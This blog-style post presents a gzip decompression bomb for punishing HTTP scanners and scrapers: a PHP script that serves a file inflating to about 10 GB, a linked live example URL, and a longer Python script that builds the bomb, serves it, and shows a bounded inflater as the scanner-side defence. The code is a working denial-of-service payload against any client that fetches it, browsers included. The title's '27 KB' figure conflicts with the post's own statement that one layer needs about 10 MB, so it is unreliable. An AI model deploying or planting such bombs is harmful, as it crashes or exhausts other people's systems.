10 GB in a 27 KB Gzip File [My Present To HTTP Scanners]

Here’s a gzip bomb I redirect HTTP scanners and web scrapers to:

10G.gz

Create a PHP file with the following:

<?php
// Tell the client the body is gzip-encoded so it inflates it on arrival.
header('Content-Encoding: gzip');
// Send the 27 KB file as-is; the client, not the server, pays for inflating it.
echo file_get_contents('10G.gz');

Example: http://rehmann.co/gz-bomb.php

How it works:

  1. A web crawler or browser requests the page and sends an "Accept-Encoding: gzip, deflate, br" header.
    As long as gzip is among the accepted encodings, the bomb does its job; a client that does not
    accept gzip just receives 27 KB of opaque bytes and is unaffected.
  2. The web server and the PHP script answer with the 27 KB gzip file and a "Content-Encoding: gzip"
    header. Only 27 KB crosses the wire.
  3. The client starts inflating the body so it can parse it (a scanner) or render it (a browser).
  4. A client that buffers the whole decompressed body in memory exhausts RAM and crashes, or gets
    killed, long before it reaches the end of the 10 GB. A client that streams the body to disk or
    caps how much it will inflate only burns CPU and bandwidth, so not every scanner goes down.

One sanity check before relying on a file: a single DEFLATE stream cannot compress better than about
1032:1, so 10 GB of zeros occupies at least about 10 MB in one gzip layer. A file far smaller than
that cannot hold a single-layer 10 GB payload; gzip applied to gzip does get tiny, but a client
inflates only the one layer named by Content-Encoding. Measure the real expansion of what you serve
with "gzip -dc 10G.gz | wc -c" rather than "gzip -l", whose uncompressed-size column comes from a
32-bit header field and wraps above 4 GB.
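The whole procedure above in one runnable script, as an added example that is not code from the original post: it builds the bomb by streaming zeros through gzip so the multi-gigabyte payload never exists uncompressed, serves it only to clients whose Accept-Encoding admits gzip (the PHP script does not check), and shows the bounded decompression a hardened scanner uses to survive it. The file name, port, handler name and the 32 MiB test size are this example's own assumptions.

```python
"""Added example (not from the original post): gzip bomb generation, an
Accept-Encoding-aware server equivalent to the PHP one-liner, and the
bounded inflater that lets a scanner survive the bomb."""
import gzip
import io
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_bomb(out, size_bytes, chunk=1 << 20):
    """Write size_bytes of zeros through gzip level 9 into the binary file
    object `out`, one chunk at a time, and return the compressed byte count.
    One DEFLATE layer cannot beat about 1032:1, so 10 GB of zeros lands near
    10 MB on disk; the zeros themselves never occupy more than `chunk` of RAM."""
    zeros = b"\x00" * chunk
    with gzip.GzipFile(fileobj=out, mode="wb", compresslevel=9, mtime=0) as gz:
        remaining = size_bytes
        while remaining > 0:
            n = min(chunk, remaining)
            gz.write(zeros if n == chunk else zeros[:n])
            remaining -= n
    return out.tell()


def build_bomb_bytes(size_bytes):
    """Same thing in memory; only the (small) compressed result is held."""
    buf = io.BytesIO()
    build_bomb(buf, size_bytes)
    return buf.getvalue()


def wants_gzip(accept_encoding):
    """True if an Accept-Encoding header admits gzip (q=0 means refused).
    Step 1 of the post: a client that does not accept gzip just gets opaque
    bytes, so serving it the bomb gains nothing."""
    q_by_coding = {}
    for item in accept_encoding.split(","):
        parts = [p.strip() for p in item.split(";")]
        coding = parts[0].lower()
        if not coding:
            continue
        q = 1.0
        for p in parts[1:]:
            if p.lower().startswith("q="):
                try:
                    q = float(p[2:])
                except ValueError:
                    q = 0.0
        q_by_coding[coding] = q
    # An explicit gzip entry wins over the wildcard.
    for coding in ("gzip", "x-gzip", "*"):
        if coding in q_by_coding:
            return q_by_coding[coding] > 0
    return False


def inflate_bounded(body, limit, chunk=1 << 16):
    """Inflate a gzip response body while holding at most `chunk` of output,
    and raise once more than `limit` bytes have been produced. This is what
    a scanner must do to survive step 4; gzip.decompress(body) would try to
    materialise the entire payload instead. Returns the decompressed size."""
    produced = 0
    with gzip.GzipFile(fileobj=io.BytesIO(body), mode="rb") as gz:
        while True:
            piece = gz.read(chunk)
            if not piece:
                return produced
            produced += len(piece)
            if produced > limit:
                raise ValueError(
                    f"decompressed body exceeds {limit} bytes "
                    f"({len(body)} bytes compressed); refusing to continue")


class BombHandler(BaseHTTPRequestHandler):
    """Equivalent of the post's PHP script, plus the Accept-Encoding check."""
    bomb_path = "10G.gz"  # assumed location of the pre-built bomb

    def do_GET(self):
        if not wants_gzip(self.headers.get("Accept-Encoding", "")):
            self.send_error(406, "only available gzip-encoded")
            return
        with open(self.bomb_path, "rb") as f:
            data = f.read()  # the compressed file is small; the client pays
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Encoding", "gzip")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    # Build the 10 GB payload once (takes a while), then serve it locally.
    with open(BombHandler.bomb_path, "wb") as f:
        print("bomb size on disk:", build_bomb(f, 10 * 1024 ** 3), "bytes")
    HTTPServer(("127.0.0.1", 8080), BombHandler).serve_forever()
```

Point "curl -sS --compressed -o /dev/null http://127.0.0.1:8080/" at it to see the caveat from step 4 in practice: curl streams the inflated body straight to /dev/null, so it burns CPU for a while but never runs out of memory, whereas a client that reads the whole response into a string does.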

gzip flags

gzip --help
Apple gzip 264.50.1
usage: gzip [-123456789acdfhklLNnqrtVv] [-S .suffix] [<file> [<file> ...]]
 -1 --fast        fastest (worst) compression
 -2 .. -8         set compression level
 -9 --best        best (slowest) compression
 -c --stdout      write to stdout, keep original files
    --to-stdout
 -d --decompress  uncompress files
    --uncompress
 -f --force       force overwriting & compress links
 -h --help        display this help
 -k --keep        don't delete input files during operation
 -l --list        list compressed file contents
 -N --name        save or restore original file name and time stamp
 -n --no-name     don't save original file name or time stamp
 -q --quiet       output no warnings
 -r --recursive   recursively compress files in directories
 -S .suf          use suffix .suf instead of .gz
    --suffix .suf
 -t --test        test compressed file
 -V --version     display program version
 -v --verbose     print extra statistics